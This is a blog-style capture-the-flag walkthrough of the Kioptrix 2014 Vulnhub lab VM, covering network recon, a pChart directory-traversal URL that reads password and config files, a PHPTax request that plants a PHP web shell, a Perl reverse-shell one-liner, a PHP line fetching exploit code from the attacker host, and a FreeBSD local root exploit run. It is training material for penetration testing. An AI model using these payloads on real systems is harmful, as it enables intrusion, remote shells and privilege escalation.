Tuesday, 16 August 2016

Kioptrix 2014

This document is for educational purposes only, I take no responsibility for other peoples actions. This is a review of the VM Kioptrix 2014 from Vulnhub - a site dedicated to penetration  testing Capture The Flag challenges. 


Scenario:
netdiscover -r 192.168.180.0/24
nmap -sV -T4 -O -F --version-light 192.168.180.137
nmap -sC -sS -T4 -A -v -v -Pn 192.168.180.137
nmap -sC -sU -T4 -A -v -v -Pn –top-ports 200 192.168.180.137
dirb http://192.168.180.137
wfuzz -c -z file,/usr/share/wfuzz/wordlist/general/big.txt --hc 404 http://192.168.180.137/FUZZ
smbclient -N -L 192.168.180.137
enum4linux -a 192.168.180.137
nikto -h 192.168.180.137

 Currently scanning: Finished!   |   Screen View: Unique Hosts              
                                                                             
 4 Captured ARP Req/Rep packets, from 4 hosts.   Total size: 240            
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname    
 -----------------------------------------------------------------------------
 192.168.180.1   00:50:56:c0:00:08      1      60  VMware, Inc.              
 192.168.180.2   00:50:56:f9:f6:4a      1      60  VMware, Inc.              
 192.168.180.137 00:0c:29:6c:0a:ef      1      60  VMware, Inc.              
 192.168.180.254 00:50:56:ea:51:b8      1      60  VMware, Inc.    

nmap -sV -T4 -O -F --version-light 192.168.180.137

Starting Nmap 7.01 ( https://nmap.org ) at 2016-07-13 01:53 EDT
Nmap scan report for 192.168.180.137
Host is up (0.00021s latency).
Not shown: 97 filtered ports
PORT     STATE  SERVICE VERSION
22/tcp   closed ssh
80/tcp   open   http    Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)
8080/tcp open   http    Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)
MAC Address: 00:0C:29:6C:0A:EF (VMware)
Device type: general purpose
Running: FreeBSD 7.X|8.X|9.X
OS CPE: cpe:/o:freebsd:freebsd:7 cpe:/o:freebsd:freebsd:8 cpe:/o:freebsd:freebsd:9
OS details: FreeBSD 7.0-RELEASE - 9.0-RELEASE
Network Distance: 1 hop

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.77 seconds

dirb http://192.168.180.137

-----------------
DIRB v2.22  
By The Dark Raver
-----------------

START_TIME: Wed Jul 13 02:11:19 2016
URL_BASE: http://192.168.180.137/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                        

---- Scanning URL: http://192.168.180.137/ ----
+ http://192.168.180.137/cgi-bin/ (CODE:403|SIZE:210)                          
+ http://192.168.180.137/index.html (CODE:200|SIZE:152)                      
                                                                             
-----------------
END_TIME: Wed Jul 13 02:11:43 2016
DOWNLOADED: 4612 - FOUND: 2

 wfuzz -c -z file,/usr/share/wfuzz/wordlist/general/big.txt --hc 404 http://192.168.180.137/FUZZ
********************************************************
* Wfuzz 2.1.3 - The Web Bruteforcer                      *
********************************************************

Target: http://192.168.180.137/FUZZ
Total requests: 3036

==================================================================
ID Response   Lines      Word         Chars          Request  
==================================================================

00527:  C=403      8 L      22 W    210 Ch  "cgi-bin/"
..."
03027:  C=404      7 L      24 W    206 Ch  "champion"..."
Fatal exception: Pycurl error 7: Failed to connect to 192.168.180.137 port 80: Connection timed out

None


nikto -h 192.168.180.137
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.180.137
+ Target Hostname:    192.168.180.137
+ Target Port:        80
+ Start Time:         2016-07-13 02:17:46 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.2.21 (FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8
+ Server leaks inodes via ETags, header found with file /, inode: 67014, size: 152, mtime: Sat Mar 29 13:22:52 2014
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ OpenSSL/0.9.8q appears to be outdated (current is at least 1.0.1j). OpenSSL 1.0.0o and 0.9.8zc are also current.
+ Apache/2.2.21 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ PHP/5.3.8 appears to be outdated (current is at least 5.6.9). PHP 5.5.25 and 5.4.41 are also current.
+ mod_ssl/2.2.21 appears to be outdated (current is at least 2.8.31) (may depend on server version)
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE 
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0082, OSVDB-756.
+ 8345 requests: 0 error(s) and 11 item(s) reported on remote host
+ End Time:           2016-07-13 02:18:53 (GMT-4) (67 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

Source of index:
<html>
 <head>
  <!--
  <META HTTP-EQUIV="refresh" CONTENT="5;URL=pChart2.1.3/index.php">
  -->
 </head>

 <body>
  <h1>It works!</h1>
 </body>
</html>

nikto -h 192.168.180.137:8080
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.180.137
+ Target Hostname:    192.168.180.137
+ Target Port:        8080
+ Start Time:         2016-07-13 02:31:24 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.2.21 (FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ All CGI directories 'found', use '-C none' to test none
+ OpenSSL/0.9.8q appears to be outdated (current is at least 1.0.1j). OpenSSL 1.0.0o and 0.9.8zc are also current.
+ PHP/5.3.8 appears to be outdated (current is at least 5.6.9). PHP 5.5.25 and 5.4.41 are also current.
+ Apache/2.2.21 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ mod_ssl/2.2.21 appears to be outdated (current is at least 2.8.31) (may depend on server version)
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0082, OSVDB-756.

Here I really got annoyed because at seems the scan get's filtered. So I  decided to switch the browser agent string: 
Mozilla/5.0 (Windows NT x.y; Win64; x64; rv:10.0) Gecko/20100101 Firefox/10.0

Try 2:
 wfuzz -c -z file,/usr/share/wfuzz/wordlist/general/big.txt --hc 404 http://192.168.180.137/FUZZ -H "Mozilla/5.0 (Windows NT x.y; Win64; x64; rv:10.0) Gecko/20100101 Firefox/10.0"

Also here
etc/nikto.conf

No luck. Let us go another path:
https://www.exploit-db.com/exploits/31173/


http://192.168.180.137/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/passwd

 # $FreeBSD: release/9.0.0/etc/master.passwd 218047 2011-01-28 22:29:38Z pjd $
#
root:*:0:0:Charlie &:/root:/bin/csh
toor:*:0:0:Bourne-again Superuser:/root:
daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin
operator:*:2:5:System &:/:/usr/sbin/nologin
bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin
tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin
kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin
games:*:7:13:Games pseudo-user:/usr/games:/usr/sbin/nologin
news:*:8:8:News Subsystem:/:/usr/sbin/nologin
man:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin
sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin
smmsp:*:25:25:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin
mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin
bind:*:53:53:Bind Sandbox:/:/usr/sbin/nologin
proxy:*:62:62:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin
_pflogd:*:64:64:pflogd privsep user:/var/empty:/usr/sbin/nologin
_dhcp:*:65:65:dhcp programs:/var/empty:/usr/sbin/nologin
uucp:*:66:66:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico
pop:*:68:6:Post Office Owner:/nonexistent:/usr/sbin/nologin
www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin
hast:*:845:845:HAST unprivileged user:/var/empty:/usr/sbin/nologin
nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin
mysql:*:88:88:MySQL Daemon:/var/db/mysql:/usr/sbin/nologin
ossec:*:1001:1001:User &:/usr/local/ossec-hids:/sbin/nologin
ossecm:*:1002:1001:User &:/usr/local/ossec-hids:/sbin/nologin
ossecr:*:1003:1001:User &:/usr/local/ossec-hids:/sbin/nologin


http://192.168.180.137/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2f/etc/ssh/ssh_host_rsa_key.pub
 ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC6FPh3YLGl3HJ64W5kcTmsHc4sAI7CMVlnLLoo71P/UYM12o8GWEqMkWWLdlyzN7w/Z2PfHnNw8D9lkSjqoKLpyi0nFLSX9NfKCcm2fec0N0/741kRrnmAv0xe6N939PjMPTilagFzmakkm2JE12D8X+29lcj1bDSzEAZalCC/gEOYIhJlZJhTVCGQEBT5Te4/H/jbFAEIvYYsg/rHJ9ssV4IU1ZY+TDf8CI+g/TcjQR9qJI+cyYJFTlKezjYZEkljOcrNXpqMrRB+taiJQBDx8OxRj1mFUO8gHd+NOgYYmicjOx6BODAP6Mvf7QR9ULNDK34oPAgpVvP56UNZaeOL root@testing

<html><title>PHPTAX by William L. Berggren 2003(c)</title>
<body bgcolor='777777' link='000000' vlink='000000' alink='000000'>
<table cellpadding='2' cellspacing='0' border='1' width='780' bgcolor='#999900'>

Let's have a peek in the apache conf file:
https://www.freebsd.org/doc/handbook/network-apache.html
In FreeBSD, the main Apache HTTP Server configuration file is installed as /usr/local/etc/apache2x/httpd.conf, where x represents the version number.

http://192.168.180.137/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2f/usr/local/etc/apache22/httpd.conf

<IfModule ssl_module>
SSLRandomSeed startup builtin
SSLRandomSeed connect builtin
</IfModule>

SetEnvIf User-Agent ^Mozilla/4.0 Mozilla4_browser

<VirtualHost *:8080>
    DocumentRoot /usr/local/www/apache22/data2

<Directory "/usr/local/www/apache22/data2">
    Options Indexes FollowSymLinks
    AllowOverride All
    Order allow,deny
    Allow from env=Mozilla4_browser
</Directory>

I have found instructions to change the user agent here: http://www.brighthub.com/internet/google/articles/90768.aspx

HOWTO: Change User Agent in Firefox/Iceweasel
Open the internal browser page about:config
Acknowledge the warranty warning (“I’ll be carefull…”)
Right-click → “New” → “String”
An dialog box opens that asks for the name of the new string. Give it the name general.useragent.override .
Set its value to the user agent string you wish to be sent, e.g. Mozilla/5.0 to hide the Firefox version, the operating system you’re using and the language of your browser.

This exploit did not work so, let us try manually:
https://www.exploit-db.com/exploits/25849/

http://192.168.180.137:8080/phptax/index.php?field=rce.php&newvalue=%3C%3Fphp%20passthru%28%24_GET[cmd]%29%3B%3F%3E


http://192.168.180.137:8080/phptax/data/rce.php?cmd=id
uid=80(www) gid=80(www) groups=80(www)

em0: flags=8843 metric 0 mtu 1500 options=9b ether 00:0c:29:6c:0a:ef inet 192.168.180.137 netmask 0xffffff00 broadcast 192.168.180.255 nd6 options=29 media: Ethernet autoselect (1000baseT ) status: active plip0: flags=8810 metric 0 mtu 1500 nd6 options=29 lo0: flags=8049 metric 0 mtu 16384 options=3 inet6 ::1 prefixlen 128 inet6 fe80::1%lo0 prefixlen 64 scopeid 0x3 inet 127.0.0.1 netmask 0xff000000 nd6 options=21 ipfw0: flags=8801 metric 0 mtu 65536 nd6 options=21

http://192.168.180.137:8080/phptax/data/rce.php?cmd=cat%20/etc/ipfw.rules

#!/bin/sh ipfw -q -f flush cmd="ipfw -a add" pif="em0" # Hopefully DNS and DHCP stuff won't be blocked $cmd 0001 allow tcp from any to me 53 out via $pif setup keep-state $cmd 0002 allow udp from any to me 53 out via $pif keep-state $cmd 0003 allow log udp from any to me 67 out via $pif keep-state $cmd 0004 allow log udp from any to me 68 out via $pif keep-state $cmd 0010 allow all from any to any via lo0 $cmd 0020 allow tcp from any to any 80 out via $pif setup keep-state $cmd 0030 allow tcp from any to any 443 out via $pif setup keep-state $cmd 0040 allow tcp from any to any out setup keep-state # Deny ICMP requests $cmd 0100 deny icmp from any to any via $pif # Allow SSH and HTTP requests $cmd 0200 allow tcp from any to me 22 in via $pif setup limit src-addr 2 $cmd 0201 allow tcp from any to me 80 in via $pif setup limit src-addr 2 $cmd 0201 allow tcp from any to me 8080 in via $pif setup limit src-addr 2 # Attempt to stop OS finger printing ipfw add 780 deny log tcp from any to any 0 in via en0 setup keep-state ipfw add 781 deny log udp from any to any 0 in via en0 keep-state # Deny everything else and log $cmd 0999 deny log all from any to any

nc, wget,curl did not work
http://192.168.180.137:8080/phptax/data/rce.php?cmd=perl%20-v

http://192.168.180.137:8080/phptax/data/rce.php?cmd=ps%20aux
USER PID %CPU %MEM VSZ RSS TT STAT STARTED TIME COMMAND root 11 98.0 0.0 0 16 ?? RL 7:26AM 35:48.34 [idle] root 0 0.0 0.0 0 160 ?? DLs 7:26AM 0:00.03 [kernel] root 1 0.0 0.1 6280 604 ?? ILs 7:26AM 0:00.00 /sbin/init -- root 2 0.0 0.0 0 16 ?? DL 7:26AM 0:00.00 [mpt_recovery0] root 3 0.0 0.0 0 16 ?? DL 7:26AM 0:00.00 [fdc0] root 4 0.0 0.0 0 16 ?? DL 7:26AM 0:00.00 [sctp_iterator] root 5 0.0 0.0 0 16 ?? DL 7:26AM 0:00.00 [xpt_thrd] root 6 0.0 0.0 0 16 ?? DL 7:26AM 0:00.00 [pagedaemon] root 7 0.0 0.0 0 16 ?? DL 7:26AM 0:00.00 [vmdaemon] root 8 0.0 0.0 0 16 ?? DL 7:26AM 0:00.00 [pagezero] root 9 0.0 0.0 0 16 ?? DL 7:26AM 0:00.00 [bufdaemon] root 10 0.0 0.0 0 16 ?? DL 7:26AM 0:00.00 [audit] root 12 0.0 0.0 0 224 ?? WL 7:26AM 0:01.58 [intr] root 13 0.0 0.0 0 48 ?? DL 7:26AM 0:00.39 [geom] root 14 0.0 0.0 0 16 ?? DL 7:26AM 0:00.05 [yarrow] root 15 0.0 0.0 0 16 ?? DL 7:26AM 0:00.06 [syncer] root 16 0.0 0.0 0 16 ?? DL 7:26AM 0:00.00 [vnlru] root 17 0.0 0.0 0 16 ?? DL 7:26AM 0:00.01 [softdepflush] root 105 0.0 0.1 10060 1212 ?? Is 7:26AM 0:00.00 adjkerntz -i root 559 0.0 0.2 10052 1576 ?? Is 7:26AM 0:00.00 dhclient: em0 [ _dhcp 625 0.0 0.2 10052 1712 ?? Is 7:26AM 0:00.00 dhclient: em0 ( root 641 0.0 0.3 10372 3488 ?? Is 7:26AM 0:00.00 /sbin/devd root 833 0.0 0.2 12184 1628 ?? Is 7:26AM 0:00.00 /usr/sbin/syslo root 977 0.0 0.2 10056 1560 ?? I 7:26AM 0:00.00 /usr/local/osse ossec 981 0.0 0.3 10052 3404 ?? S 7:26AM 0:00.59 /usr/local/osse root 985 0.0 0.2 10052 1628 ?? S 7:26AM 0:00.02 /usr/local/osse root 989 0.0 0.2 10052 2128 ?? S 7:26AM 0:00.84 /usr/local/osse ossec 993 0.0 0.2 10052 1800 ?? S 7:26AM 0:00.00 /usr/local/osse mysql 1098 0.0 0.2 14636 1964 ?? Is 7:26AM 0:00.00 /bin/sh /usr/lo mysql 1178 0.0 4.6 219884 47144 ?? I 7:26AM 0:00.31 /usr/local/libe root 1192 0.0 1.3 206796 13556 ?? Ss 7:26AM 0:00.13 /usr/local/sbin root 1220 0.0 0.4 20384 4116 ?? Ss 7:26AM 0:00.02 sendmail: accep smmsp 1224 0.0 0.4 20384 4128 ?? Is 7:26AM 0:00.00 sendmail: Queue root 1230 0.0 0.2 14260 1716 ?? Ss 7:26AM 0:00.00 /usr/sbin/cron www 1241 0.0 2.0 210892 20464 ?? S 7:26AM 0:00.09 /usr/local/sbin www 1242 0.0 2.1 210892 21756 ?? S 7:26AM 0:00.04 /usr/local/sbin www 1243 0.0 2.1 210892 21768 ?? S 7:26AM 0:00.03 /usr/local/sbin www 1244 0.0 2.1 210892 21768 ?? I 7:26AM 0:00.03 /usr/local/sbin www 1245 0.0 2.1 210892 21768 ?? I 7:26AM 0:00.04 /usr/local/sbin root 1277 0.0 0.4 26372 3876 ?? I 7:26AM 0:00.77 /usr/local/lib/ www 1353 0.0 2.1 210892 21768 ?? S 7:28AM 0:00.12 /usr/local/sbin www 1494 0.0 1.4 206796 14536 ?? I 7:56AM 0:00.00 /usr/local/sbin www 1525 0.0 0.1 14328 1476 ?? R 8:03AM 0:00.00 ps aux root 1294 0.0 7.4 111632 76688 v0- S 7:26AM 0:38.15 /usr/local/bin/ root 1337 0.0 0.1 12184 1372 v0 Is+ 7:26AM 0:00.00 /usr/libexec/ge root 1338 0.0 0.1 12184 1372 v1 Is+ 7:26AM 0:00.00 /usr/libexec/ge root 1339 0.0 0.1 12184 1372 v2 Is+ 7:26AM 0:00.00 /usr/libexec/ge root 1340 0.0 0.1 12184 1372 v3 Is+ 7:26AM 0:00.00 /usr/libexec/ge root 1341 0.0 0.1 12184 1372 v4 Is+ 7:26AM 0:00.00 /usr/libexec/ge root 1342 0.0 0.1 12184 1372 v5 Is+ 7:26AM 0:00.00 /usr/libexec/ge root 1343 0.0 0.1 12184 1372 v6 Is+ 7:26AM 0:00.00 /usr/libexec/ge root 1344 0.0 0.1 12184 1372 v7 Is+ 7:26AM 0:00.00 /usr/libexec/ge

Let's try with perl
http://192.168.180.137:8080/phptax/data/rce.php?cmd=perl%20-MIO%20-e%20%27$p=fork;exit,if%28$p%29;$c=new%20IO::Socket::INET%28PeerAddr,%22192.168.180.132:443%22%29;STDIN-%3Efdopen%28$c,r%29;$~-%3Efdopen%28$c,w%29;system$_%20while%3C%3E;%27

On our end:
nc -nlvp 443
listening on [any] 443 ...
connect to [192.168.180.132] from (UNKNOWN) [192.168.180.137] 30456
whoami
www

ps -aux
USER    PID  %CPU %MEM    VSZ    RSS  TT  STAT STARTED     TIME COMMAND
root     11  98.0  0.0      0     16  ??  RL    7:26AM 69:10.59 [idle]
root   1294   1.0  7.5 111632  76844  v0- S     7:26AM  1:13.97 /usr/local/bin/
root      0   0.0  0.0      0    160  ??  DLs   7:26AM  0:00.04 [kernel]
root      1   0.0  0.1   6280    604  ??  ILs   7:26AM  0:00.00 /sbin/init --
root      2   0.0  0.0      0     16  ??  DL    7:26AM  0:00.00 [mpt_recovery0]
root      3   0.0  0.0      0     16  ??  DL    7:26AM  0:00.01 [fdc0]
root      4   0.0  0.0      0     16  ??  DL    7:26AM  0:00.00 [sctp_iterator]
root      5   0.0  0.0      0     16  ??  DL    7:26AM  0:00.00 [xpt_thrd]
root      6   0.0  0.0      0     16  ??  DL    7:26AM  0:00.00 [pagedaemon]
root      7   0.0  0.0      0     16  ??  DL    7:26AM  0:00.00 [vmdaemon]
root      8   0.0  0.0      0     16  ??  DL    7:26AM  0:00.00 [pagezero]
root      9   0.0  0.0      0     16  ??  DL    7:26AM  0:00.01 [bufdaemon]
root     10   0.0  0.0      0     16  ??  DL    7:26AM  0:00.00 [audit]
root     12   0.0  0.0      0    224  ??  WL    7:26AM  0:03.02 [intr]
root     13   0.0  0.0      0     48  ??  DL    7:26AM  0:00.47 [geom]
root     14   0.0  0.0      0     16  ??  DL    7:26AM  0:00.09 [yarrow]
root     15   0.0  0.0      0     16  ??  DL    7:26AM  0:00.12 [syncer]
root     16   0.0  0.0      0     16  ??  DL    7:26AM  0:00.01 [vnlru]
root     17   0.0  0.0      0     16  ??  DL    7:26AM  0:00.02 [softdepflush]
root    105   0.0  0.1  10060   1212  ??  Is    7:26AM  0:00.00 adjkerntz -i
root    559   0.0  0.2  10052   1576  ??  Is    7:26AM  0:00.00 dhclient: em0 [
_dhcp   625   0.0  0.2  10052   1712  ??  Is    7:26AM  0:00.01 dhclient: em0 (
root    641   0.0  0.3  10372   3488  ??  Is    7:26AM  0:00.00 /sbin/devd
root    833   0.0  0.2  12184   1628  ??  Is    7:26AM  0:00.01 /usr/sbin/syslo
root    977   0.0  0.2  10056   1560  ??  S     7:26AM  0:00.01 /usr/local/osse
ossec   981   0.0  0.3  10052   3404  ??  I     7:26AM  0:00.59 /usr/local/osse
root    985   0.0  0.2  10052   1628  ??  S     7:26AM  0:00.04 /usr/local/osse
root    989   0.0  0.2  10052   2128  ??  I     7:26AM  0:01.48 /usr/local/osse
ossec   993   0.0  0.2  10052   1800  ??  S     7:26AM  0:00.00 /usr/local/osse
mysql  1098   0.0  0.2  14636   1964  ??  Is    7:26AM  0:00.00 /bin/sh /usr/lo
mysql  1178   0.0  4.6 219884  47144  ??  I     7:26AM  0:00.55 /usr/local/libe
root   1192   0.0  1.3 206796  13556  ??  Ss    7:26AM  0:00.16 /usr/local/sbin
root   1220   0.0  0.4  20384   4116  ??  Ss    7:26AM  0:00.04 sendmail: accep
smmsp  1224   0.0  0.4  20384   4128  ??  Is    7:26AM  0:00.00 sendmail: Queue
root   1230   0.0  0.2  14260   1716  ??  Ss    7:26AM  0:00.01 /usr/sbin/cron
www    1241   0.0  2.0 210892  20464  ??  I     7:26AM  0:00.09 /usr/local/sbin
www    1242   0.0  2.1 210892  21756  ??  I     7:26AM  0:00.04 /usr/local/sbin
www    1243   0.0  2.1 210892  21768  ??  I     7:26AM  0:00.04 /usr/local/sbin
www    1244   0.0  2.1 210892  21768  ??  I     7:26AM  0:00.04 /usr/local/sbin
www    1245   0.0  2.1 210892  21768  ??  I     7:26AM  0:00.04 /usr/local/sbin
root   1277   0.0  0.4  26404   3888  ??  I     7:26AM  0:01.48 /usr/local/lib/
www    1353   0.0  2.1 210892  21768  ??  I     7:28AM  0:00.12 /usr/local/sbin
www    1494   0.0  1.4 206796  14552  ??  S     7:56AM  0:00.01 /usr/local/sbin
www    1631   0.0  0.5  30260   5572  ??  S     8:34AM  0:00.00 perl -MIO -e $p
www    1643   0.0  0.1  14328   1472  ??  R     8:37AM  0:00.00 ps -aux
root   1337   0.0  0.1  12184   1372  v0  Is+   7:26AM  0:00.00 /usr/libexec/ge
root   1338   0.0  0.1  12184   1372  v1  Is+   7:26AM  0:00.00 /usr/libexec/ge
root   1339   0.0  0.1  12184   1372  v2  Is+   7:26AM  0:00.00 /usr/libexec/ge
root   1340   0.0  0.1  12184   1372  v3  Is+   7:26AM  0:00.00 /usr/libexec/ge
root   1341   0.0  0.1  12184   1372  v4  Is+   7:26AM  0:00.00 /usr/libexec/ge
root   1342   0.0  0.1  12184   1372  v5  Is+   7:26AM  0:00.00 /usr/libexec/ge
root   1343   0.0  0.1  12184   1372  v6  Is+   7:26AM  0:00.00 /usr/libexec/ge
root   1344   0.0  0.1  12184   1372  v7  Is+   7:26AM  0:00.00 /usr/libexec/ge

We already know from the passwd file that this is FreeBSD 9.00 so it is time to exploit:
https://www.exploit-db.com/exploits/28718/

We download the file with a this php I have prepared:
echo "<?php file_put_contents('28718.c', fopen('http://192.168.180.132/28718.c', 'r')); ?>" > down2.php

./28718
[+] SYSRET FUCKUP!!
[+] Start Engine...
[+] Crotz...
[+] Crotz...
[+] Crotz...
[+] Woohoo!!!

ls /root/
.cshrc
.history
.k5login
.login
.mysql_history
.profile
congrats.txt
folderMonitor.log
httpd-access.log
lazyClearLog.sh
monitor.py
ossec-alerts.log


cat /root/congrats.txt
If you are reading this, it means you got root (or cheated).
Congratulations either way...

Hope you enjoyed this new VM of mine. As always, they are made for the beginner in 
mind, and not meant for the seasoned pentester. However this does not mean one 
can't enjoy them.

As with all my VMs, besides getting "root" on the system, the goal is to also
learn the basics skills needed to compromise a system. Most importantly, in my mind,
are information gathering & research. Anyone can throw massive amounts of exploits
and "hope" it works, but think about the traffic.. the logs... Best to take it
slow, and read up on the information you gathered and hopefully craft better
more targetted attacks. 

For example, this system is FreeBSD 9. Hopefully you noticed this rather quickly.
Knowing the OS gives you any idea of what will work and what won't from the get go.
Default file locations are not the same on FreeBSD versus a Linux based distribution.
Apache logs aren't in "/var/log/apache/access.log", but in "/var/log/httpd-access.log".
It's default document root is not "/var/www/" but in "/usr/local/www/apache22/data".
Finding and knowing these little details will greatly help during an attack. Of course
my examples are specific for this target, but the theory applies to all systems.

As a small exercise, look at the logs and see how much noise you generated. Of course
the log results may not be accurate if you created a snapshot and reverted, but at least
it will give you an idea. For fun, I installed "OSSEC-HIDS" and monitored a few things.
Default settings, nothing fancy but it should've logged a few of your attacks. Look
at the following files:
/root/folderMonitor.log
/root/httpd-access.log (softlink)
/root/ossec-alerts.log (softlink)

The folderMonitor.log file is just a cheap script of mine to track created/deleted and modified
files in 2 specific folders. Since FreeBSD doesn't support "iNotify", I couldn't use OSSEC-HIDS 
for this.
The httpd-access.log is rather self-explanatory .
Lastly, the ossec-alerts.log file is OSSEC-HIDS is where it puts alerts when monitoring certain
files. This one should've detected a few of your web attacks.

Feel free to explore the system and other log files to see how noisy, or silent, you were.
And again, thank you for taking the time to download and play.
Sincerely hope you enjoyed yourself.

Be good...


loneferret
http://www.kioptrix.com


p.s.: Keep in mind, for each "web attack" detected by OSSEC-HIDS, by
default it would've blocked your IP (both in hosts.allow & Firewall) for
600 seconds. I was nice enough to remove that part :)

Best Regards,
Yuriy Stanchev/URIX


References:
https://jivoi.github.io/2015/07/01/pentest-tips-and-tricks/